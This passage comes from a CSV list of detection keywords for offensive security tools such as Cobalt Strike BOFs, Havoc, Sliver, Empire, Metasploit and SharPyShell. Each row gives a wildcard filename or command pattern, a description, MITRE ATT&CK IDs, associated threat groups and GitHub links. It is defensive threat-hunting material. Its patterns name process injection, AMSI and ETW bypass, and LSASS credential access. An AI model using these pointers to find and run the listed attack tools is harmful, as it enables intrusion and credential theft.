It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*inject.spawn*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*inject.spoofaddr*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*inject_dll_reflective.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*inject_dll_srdi.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*inject_shellcode.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# 
web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*inject_shellcode_self*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*inject-amsiBypass *","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 
- T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","0","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*inject-amsi-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*inject-amsiBypass.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*inject-assembly *","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","0","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*inject-assembly.cna*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*injectassembly.x64.bin*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*injectassembly.x64.o*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*Inject-BypassStuff*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*InjectDll.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*InjectDll.vcxproj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*injected into LSASS*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*InjectedCredentials.csv*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*injectEtwBypass*","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","253","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" +"*inject-etw-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*injectify*","offensive_tool_keyword","injectify","Perform advanced MiTM attacks on websites with ease.","T1557.001 - T1190 - T1071.001 - T1056.001","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/samdenty/injectify","1","0","N/A","N/A","7","650","122","2022-07-20T15:02:37Z","2017-11-06T17:01:50Z" +"*Injection* -ProcName lsass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Injection\Spawn32*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Injection\Spawn64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command 
and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Injection-Exploit-1.0-SNAPSHOT-all.jar*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" +"*Injections/Traversal.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Injections/XSS.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Inject-LocalShellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*InjectMate.py*","offensive_tool_keyword","burpsuite","Multi-tabbed extension that helps generate payloads for various purposes (XSS. SQLi. Header injection. 
and more).","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" +"*InjectMateCommunity.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" +"*Injector.exe*","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","242","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" +"*injector.ps1*.kirbi*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*InjectPERemote.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*InjectPEWMIFSRemote*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - 
T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*InjectProc*","offensive_tool_keyword","InjectProc","Process injection is a very popular method to hide malicious behavior of code and are heavily used by malware authors.There are several techniques. which are commonly used: DLL injection. process replacement (a.k.a process hollowing). hook injection and APC injection.","T1055 - T1055.012 - T1055.001 - T1055.003","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secrary/InjectProc","1","0","N/A","N/A","10","981","225","2019-02-10T11:05:15Z","2017-05-26T08:08:20Z" +"*injectremote.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*Inject-RemoteShellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
